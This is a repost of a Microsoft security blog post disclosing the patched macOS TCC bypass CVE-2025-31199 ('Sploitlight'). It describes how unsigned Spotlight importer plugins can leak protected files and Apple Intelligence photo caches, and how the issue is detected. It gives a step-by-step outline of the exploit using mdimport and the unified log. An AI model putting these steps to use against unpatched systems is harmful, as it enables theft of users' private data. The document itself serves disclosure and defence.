{"id":59104,"date":"2025-07-28T16:00:00","date_gmt":"2025-07-28T16:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=141286"},"modified":"2025-07-28T16:00:00","modified_gmt":"2025-07-28T16:00:00","slug":"sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","title":{"rendered":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability"},"content":{"rendered":"<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence has discovered a macOS vulnerability that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), such as files in the <em>Downloads<\/em> folder, as well as caches utilized by Apple Intelligence. While similar to prior TCC bypasses like <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2024\/10\/17\/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access\/\">HM-Surf<\/a> and <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/01\/10\/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access\/\">powerdir<\/a>, the implications of this vulnerability, which we refer to as \u201cSploitlight\u201d for its use of Spotlight plugins, are more severe due to its ability to extract and leak sensitive information cached by Apple Intelligence, such as precise geolocation data, photo and video metadata, face and person recognition data, search history and user preferences, and more. These risks are further complicated and heightened by the remote linking capability between iCloud accounts, meaning an attacker with access to a user\u2019s macOS device could also exploit the vulnerability to determine remote information of other devices linked to the same iCloud account.<\/p>\n<p class=\"wp-block-paragraph\">After discovering the bypass technique during proactive hunting for processes with privileged entitlements, we shared our findings with Apple through <a href=\"https:\/\/www.microsoft.com\/msrc\/cvd\">Coordinated Vulnerability Disclosure (CVD)<\/a> via <a href=\"https:\/\/www.microsoft.com\/msrc\/msvr\">Microsoft Security Vulnerability Research (MSVR)<\/a>. Apple released a fix for this vulnerability, now identified as CVE-2025-31199, as part of <a href=\"https:\/\/support.apple.com\/en-us\/122373\" target=\"_blank\" rel=\"noreferrer noopener\">security updates<\/a> for macOS Sequoia, released on March 31, 2025. We thank the Apple security team for their collaboration in addressing this vulnerability and encourage macOS users to apply these security updates as soon as possible.<\/p>\n<p class=\"wp-block-paragraph\">As a reminder, TCC is a technology designed to prevent applications from accessing users\u2019 personal information, including services such as location services, camera, microphone, <em>Downloads<\/em> directory, and others, without obtaining prior consent and knowledge from users. The only legitimate method for an application to gain access to these services is through user approval via a popup prompt within the user interface or by granting per-app access in the operating system\u2019s settings.<\/p>\n<p class=\"wp-block-paragraph\">In this blog post, we display how, despite Spotlight plugins being carefully and heavily restricted to maintain their privileged access to sensitive files, they can still be abused to exfiltrate file contents. Our research demonstrates how this privileged access and the ability to manipulate these plugins blur the line between operating system components, like the <em>mds<\/em> daemon and <em>mdworker<\/em> task, and non-OS components, like the plugins themselves. Further, we show how the TCC bypass works against well-defined file types, as well as how it could be abused to get valuable data such as information tagged by Apple Intelligence and remote information of other iCloud account-linked devices.<\/p>\n<h2 class=\"wp-block-heading\" id=\"background-spotlight-importers\">Background: Spotlight importers<\/h2>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/support.apple.com\/guide\/mac-help\/search-with-spotlight-mchlp1008\/mac\" target=\"_blank\" rel=\"noreferrer noopener\">Spotlight<\/a> is a built-in macOS application that is capable of quickly finding content on a device by means of indexing. Users can use the <em>Command<\/em> +<em>Space<\/em> shortcut to trigger a file search. However, Spotlight supports plugins known as Spotlight importers to further index data found on a device. For example, Outlook can index emails for them to appear in search. Those plugins are macOS <a href=\"https:\/\/developer.apple.com\/library\/archive\/documentation\/CoreFoundation\/Conceptual\/CFBundles\/AboutBundles\/AboutBundles.html\" target=\"_blank\" rel=\"noreferrer noopener\">bundles<\/a> ending with a <em>.mdimporter<\/em> suffix, and can be listed by using the <a href=\"https:\/\/ss64.com\/mac\/mdimport.html\" target=\"_blank\" rel=\"noreferrer noopener\">mdimport<\/a> utility with the <em>-L<\/em> command line flag:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp\" alt=\"Screenshot of code depicting a list of Spotlight plugins on a typical system\" class=\"wp-image-141288 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 1. A list of Spotlight plugins on a typical system<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">To support that architecture, the technology works in a producer-consumer design, where tools such as Spotlight (or the <a href=\"https:\/\/ss64.com\/mac\/mdfind.html\" target=\"_blank\" rel=\"noreferrer noopener\"><em>mdfind<\/em><\/a> command utility) consume data from index files that are saved locally, and an indexing service produces and updates those index files.<\/p>\n<p class=\"wp-block-paragraph\">The indexing service is known as <em>mds<\/em> and acts as a system daemon. Upon file modifications, the kernel triggers the <em>mds<\/em> daemon, which in turn creates a heavily sandboxed task called <em>mdworker<\/em>, which runs the plugin logic and updates the index.<\/p>\n<p class=\"wp-block-paragraph\">Spotlight plugins have been studied in the past, notable examples include:<\/p>\n<p class=\"wp-block-paragraph\">Spotlight plugins declare which type of files they can process via their <em>Info.plist<\/em> file, and when such a file is scanned by the <em>mds<\/em> daemon, a <em>mdworker<\/em> task will eventually invoke their <a href=\"https:\/\/developer.apple.com\/library\/archive\/documentation\/Carbon\/Conceptual\/MDImporters\/Concepts\/WritingAnImp.html\" target=\"_blank\" rel=\"noreferrer noopener\"><em>GetMetadataForFile<\/em><\/a> function.<\/p>\n<h2 class=\"wp-block-heading\" id=\"turning-a-plugin-into-a-tcc-bypass\">Turning a plugin into a TCC bypass<\/h2>\n<p class=\"wp-block-paragraph\">We have covered several TCC bypasses in the past, such as <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/01\/10\/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access\/\">CVE-2021-30970<\/a> (\u201cpowerdir\u201d) and <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2024\/10\/17\/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access\/\">CVE-2024-44133<\/a> (\u201cHM-Surf\u201d). As a reminder, TCC is a technology that prevents apps from accessing users\u2019 personal information, including services such as location services, camera, microphone, <em>Downloads<\/em> directory, and others, without their prior consent and knowledge. In this blog post, we shall focus primarily on access to private files protected by TCC, such as the <em>Downloads<\/em> directory, the <em>Pictures<\/em> directory, or the user\u2019s <em>Desktop<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">Due to the privileged access that Spotlight plugins have to sensitive files for indexing purposes, Apple imposes heavy restrictions on them via its <a href=\"https:\/\/developer.apple.com\/documentation\/xcode\/configuring-the-macos-app-sandbox\" target=\"_blank\" rel=\"noreferrer noopener\">Sandbox<\/a> capabilities. On modern macOS systems, Spotlight plugins are not even permitted to read or write any file other than the one being scanned. However, we have concluded that this is insufficient, as there are multiple ways for attackers to exfiltrate the file\u2019s contents. In our exploit, we have decided to simply log the file\u2019s bytes to the unified log in chunks:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-12.webp\" alt=\"Screenshot of code depicting the scanned file's contents being leaked via logging\" class=\"wp-image-141296 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-12.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 2. Leaking the scanned file\u2019s contents via logging<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Assuming an attacker knows specific file types they wish to read, they can simply perform the following steps:<\/p>\n<ol start=\"1\" class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Change the bundle\u2019s <em>Info.plist<\/em> and <em>schema.xml<\/em> files to declare the file types they wish to leak in <a href=\"https:\/\/developer.apple.com\/library\/archive\/documentation\/FileManagement\/Conceptual\/understanding_utis\/understand_utis_intro\/understand_utis_intro.html\" target=\"_blank\" rel=\"noreferrer noopener\">UTI<\/a> form. Since we assume an attacker runs locally, this is always possible to resolve, even for dynamic types.<\/li>\n<li class=\"wp-block-list-item\">Copy the bundle into <em>~\/Library\/Spotlight<\/em> directory. Note the bundle does not need to be signed at all.<\/li>\n<li class=\"wp-block-list-item\">Force Spotlight to use the new bundle via the <em>mdimport -r<\/em> command, and validate it\u2019s indeed loaded with the <em>mdimport -L<\/em> command.<\/li>\n<li class=\"wp-block-list-item\">Use <em>mdimport -i &lt;path&gt;<\/em> to recursively scan files under the given path and leak them. Note the calling app does not require TCC permissions to the indexed directory as it\u2019s done by the <em>mdworker<\/em> task.<\/li>\n<li class=\"wp-block-list-item\">Use the log utility to read the files contents.<\/li>\n<\/ol>\n<p class=\"wp-block-paragraph\">The determination of UTI for dynamic types can be done with the <a href=\"https:\/\/manp.gs\/mac\/1\/uttype\" target=\"_blank\" rel=\"noreferrer noopener\">uttype<\/a> utility, even if the calling app does not have TCC access to the right directory. For example, here is the resolution of the TCC-protected <em>Photos.sqlite<\/em> file:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-11.webp\" alt=\"Screenshot of code depicting the resolution of a dynamic type despite lack of TCC permissions\" class=\"wp-image-141295 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-11.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 3. Resolution of a dynamic type even despite lack of TCC permissions<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Note since <em>.mdimporter<\/em> is an unsigned bundle, an attacker doesn\u2019t even need to recompile to adjust to other file types\u2014they could just modify <em>Info.plist<\/em> and <em>schema.xml<\/em> as they see fit. We therefore conclude an attacker can trivially discover and read arbitrary files from sensitive directories normally protected by TCC. Our initial exploit focused on the <em>Downloads<\/em> folder, only to later draw our attention to the <em>Pictures<\/em> folder.<\/p>\n<p class=\"wp-block-paragraph\">We have coded a full proof-of-concept (POC) exploit code dubbed \u201cSploitlight\u201d that automates this entire process and shared it with Apple:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-9.webp\" alt=\"Screenshot of the Sploitlight POC exploit discovering and leaking files from Photos even though the Terminal does not have access\" class=\"wp-image-141293 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-9.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 4. Exploitation \u2013 note the Terminal does not have access to Photos but files are still discovered and leaked<\/em><\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"exposing-more-sensitive-data-from-apple-intelligence\">Exposing more sensitive data from Apple Intelligence<\/h2>\n<p class=\"wp-block-paragraph\">The ability to read sensitive files is more dangerous than it seems. As it turns out, the newly acclaimed <a href=\"https:\/\/www.apple.com\/apple-intelligence\/\" target=\"_blank\" rel=\"noreferrer noopener\">Apple Intelligence<\/a> (which is installed by default on all ARM-based devices) performs caching of its data under various directories. For example, one such directory lives under the user\u2019s <em>Pictures<\/em> directory:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-7.webp\" alt=\"Screenshot of index files created by Apple Intelligence, including Photos.sqlite and photos.db\" class=\"wp-image-141292 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-7.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 5. Index files created by Apple Intelligence<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Access to those files is protected by the \u201cPictures\u201d TCC service type and cannot be accessed without a user\u2019s approval. However, as we previously demonstrated with the Sploitlight POC, we can leak arbitrary files\u2019 contents and thus extract the contents of those database files.<\/p>\n<p class=\"wp-block-paragraph\">There are many great utilities for extracting private information from <em>Photos.sqlite<\/em> and <em>photos.db<\/em>, but we\u2019d like to summarize what information attackers would be able to obtain:<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"24\">\n<tr>\n<td><strong>Type of data<\/strong><\/td>\n<td><strong>Information obtained<\/strong><\/td>\n<\/tr>\n<tr readability=\"9.5\">\n<td><strong>Precise geolocation data<\/strong><\/td>\n<td readability=\"8\">\u2013 GPS coordinates (latitude, longitude, altitude) associated with photos and videos.<\/p>\n<p>\u2013 Time-stamped location history, potentially reconstructing a user\u2019s movements over time.<\/p>\n<p>\u2013 Reverse-geocoded addresses or place names.<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"9.5\">\n<td><strong>Photo and video metadata<\/strong><\/td>\n<td readability=\"10\">\u2013 Timestamps of when photos and videos were taken.<\/p>\n<p>\u2013 Device model, camera settings (aperture, ISO, shutter speed).<\/p>\n<p>\u2013 Media paths pointing to stored content.<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td><strong>Face and person recognition data<\/strong><\/td>\n<td readability=\"5\">\u2013 Identified faces, sometimes linked to contact names if tagged.<\/p>\n<p>\u2013 Clustering of photos by recognized individuals.<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"10.5\">\n<td><strong>User activity and event context<\/strong><\/td>\n<td readability=\"6\">\u2013 Photo-related activities, such as screenshots, saved images, and shared content.<\/p>\n<p>\u2013 Event clustering (such as vacations, birthdays).<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"6.5\">\n<td><strong>Photo albums and shared libraries<\/strong><\/td>\n<td readability=\"6\">\u2013 User-defined photo albums and their contents.<\/p>\n<p>\u2013 Shared album details, including participants.<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><strong>Deleted photos and videos<\/strong><\/td>\n<td>\u2013 Metadata of recently deleted items that may still exist in the <em>Recently Deleted<\/em> section.<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td><strong>Image classification and object detection<\/strong><\/td>\n<td>\u2013 Labels and categories generated by the Photos app (such as \u201cbeach,\u201d \u201cdog,\u201d \u201cdocument\u201d).<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><strong>Search history and user preferences<\/strong><\/td>\n<td>\u2013 Previous search queries within the Photos app.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-6.webp\" alt=\"Screenshot of Photos.sqlite metadata\" class=\"wp-image-141289 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-6.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 6. Getting file name, description, title, GPS location, and date from Photos.sqlite metadata<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">Alongside those implications of an attacker gaining such detailed private information on a targeted user\u2019s device, it\u2019s important to remember that Apple devices that share the same iCloud account will have different <em>Photos.sqlite<\/em> database files, but face tagging and other metadata propagates between devices. This means that an attacker with access to a user\u2019s macOS device would also be able to determine remote information of other devices linked to that user\u2019s iCloud account, such as data from the target user\u2019s iPhone.<\/p>\n<p class=\"wp-block-paragraph\">In addition, threat actors could just as easily gain private data from other Apple Intelligence cached files, such as <a href=\"https:\/\/github.com\/mac4n6\/Presentations\/blob\/master\/Using%20Apple%20Intelligence%20%5BAI%5D%20Data%20in%20Investigations\/UsingAppleIntelligenceDataInInvestigations.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">email summaries and notes written with ChatGPT<\/a>.<\/p>\n<h2 class=\"wp-block-heading\" id=\"strengthening-protection-against-tcc-bypass-attacks\">Strengthening protection against TCC bypass attacks<\/h2>\n<p class=\"wp-block-paragraph\">Attackers with the ability to bypass TCC protections on macOS devices can access sensitive data without user consent. The ability to further exfiltrate private data from protected directories, such as the <em>Downloads<\/em> folder and Apple Intelligence caches, is particularly alarming due to the highly sensitive nature of the information that can be extracted, including geolocation data, media metadata, and user activities. The implications of this vulnerability are even more extensive given the remote linking capability between devices using the same iCloud account, enabling attackers to determine more remote information about a user through their linked devices. Understanding the implications of TCC bypass vulnerabilities is essential for building proactive defenses that safeguard user data from unauthorized access.<\/p>\n<p class=\"wp-block-paragraph\">By comprehending the broader impacts of these security concerns, we can better defend users and ensure their digital safety. <a href=\"https:\/\/www.microsoft.com\/security\/business\/endpoint-security\/microsoft-defender-endpoint\">Microsoft Defender for Endpoint<\/a> allows organizations to quickly discover and remediate vulnerabilities such as Sploitlight in their increasingly heterogeneous networks. The insights gained from this research have enabled us to enhance Microsoft Defender for Endpoint\u2019s detection mechanisms, providing robust protection against unauthorized access to private data by proactively detecting anomalous <em>.mdimporter<\/em> bundle installations, alongside any suspicious index of sensitive directories:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-10.webp\" alt=\"Screenshot of Defender for Endpoint's detection reading Suspicious Spotlight operation\" class=\"wp-image-141294 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-10.webp\"><figcaption class=\"wp-element-caption\"><em>Figure 7. Microsoft Defender for Endpoint detection of unusual Spotlight operations<\/em><\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">By continuously improving our security solutions, we aim to safeguard user information and uphold the trust placed in our products. Moreover, this research emphasizes the importance of continuous vigilance and collaboration with software vendors and the security community to identify and mitigate such vulnerabilities before they can be exploited. We would like to again thank the Apple security team for their collaboration in fixing CVE-2025-31199.<\/p>\n<p class=\"wp-block-paragraph\">We encourage users to ensure they have applied the <a href=\"https:\/\/support.apple.com\/en-us\/122373\" target=\"_blank\" rel=\"noreferrer noopener\">security updates<\/a> released by Apple to mitigate this issue.<\/p>\n<p class=\"wp-block-paragraph\">As cross-platform threats become more prevalent, Microsoft remains vigilant in monitoring the threat landscape to discover new vulnerabilities and attacker techniques affecting macOS and other non-Windows devices. Our proactive approach to vulnerability discoveries and threat intelligence sharing enhances protection technologies, ensuring that users can enjoy a secure computing experience safeguarded from threats, regardless of the platform or device they use.<\/p>\n<p class=\"wp-block-paragraph\"><strong>Jonathan Bar Or<\/strong><\/p>\n<p class=\"wp-block-paragraph\"><strong>Alexia Wilson<\/strong><\/p>\n<p class=\"wp-block-paragraph\"><strong>Christine Fossaceca<\/strong><br \/><em>Microsoft Threat Intelligence<\/em><\/p>\n<h2 class=\"wp-block-heading\" id=\"references\">References<\/h2>\n<h2 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h2>\n<p class=\"wp-block-paragraph\">Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our <a href=\"https:\/\/microsoftsecurityevents.eventbuilder.com\/events\/11f048838dabd650892acff3dd777035?ref=blog\" target=\"_blank\" rel=\"noreferrer noopener\">VIP Mixer at Black Hat 2025<\/a>. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.<\/p>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/get-started-security-copilot\">Security Copilot<\/a>&nbsp;customers can use the standalone experience to&nbsp;<a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/prompting-security-copilot#create-your-own-prompts\" target=\"_blank\" rel=\"noreferrer noopener\">create their own prompts<\/a>&nbsp;or run&nbsp;<a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/using-promptbooks\" target=\"_blank\" rel=\"noreferrer noopener\">pre-built promptbooks<\/a>&nbsp;to automate incident response or investigation tasks related to this threat.<\/p>\n<p class=\"wp-block-paragraph\">For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog:&nbsp;<a href=\"https:\/\/aka.ms\/threatintelblog\">https:\/\/aka.ms\/threatintelblog<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href=\"https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence\">https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence<\/a>, and on X (formerly Twitter) at&nbsp;<a href=\"https:\/\/x.com\/MsftSecIntel\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/x.com\/MsftSecIntel<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\">https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence<\/a>.<\/p>\n<p> READ MORE <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/07\/28\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft Threat Intelligence has discovered a macOS vulnerability, tracked as CVE-2025-31199, that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), including the ability to extract and leak sensitive information cached by Apple Intelligence.<br \/>\nThe post Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability appeared first on Microsoft Security Blog. READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[276],"tags":[],"class_list":["post-59104","post","type-post","status-publish","format-standard","hentry","category-microsoft-secure"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-28T16:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"432\" \/>\n\t<meta property=\"og:image:height\" content=\"435\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability\",\"datePublished\":\"2025-07-28T16:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\"},\"wordCount\":2087,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\",\"articleSection\":[\"Microsoft Secure\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\",\"name\":\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\",\"datePublished\":\"2025-07-28T16:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\",\"contentUrl\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 